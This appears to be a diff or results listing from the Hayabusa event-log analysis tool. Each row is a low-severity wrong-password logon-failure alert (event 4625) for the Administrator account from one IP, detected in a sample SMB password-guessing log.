+2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
